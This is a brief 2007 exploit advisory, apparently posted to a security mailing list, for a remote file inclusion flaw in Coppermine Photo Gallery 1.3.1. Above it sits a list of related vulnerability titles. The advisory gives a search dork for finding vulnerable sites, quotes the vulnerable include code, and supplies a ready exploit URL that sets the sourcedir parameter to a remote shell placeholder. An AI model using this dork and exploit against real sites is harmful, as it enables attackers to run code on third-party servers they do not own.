Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

CA.View/view-law. asp/view-info.asp sql injection

Education_info/edu_vi ew.asp sql injection

Shoutbox 1.0 Remote Command Execution Vulnerability

[Aria-Security.net] SAS Hotel Management System SQL Injection

From:	master-of-desastor_(at)_hotmail.com <master-of-desastor_(at)_hotmail.com>
Date:	10.08.2007
Subject:	Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability

DoRk:"Powered by Coppermine Photo Gallery"
Vuln. code:
require_once("$sourcedir/Load.
php");require_once("$sourcedir/Security.php");
Exploit:
www.server.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL]
Author:Ma$tEr-0F-De$a$t0r